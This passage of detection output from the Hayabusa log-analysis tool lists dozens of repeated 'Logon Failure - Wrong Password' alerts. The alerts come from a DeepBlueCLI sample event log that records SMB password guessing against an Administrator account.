NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: 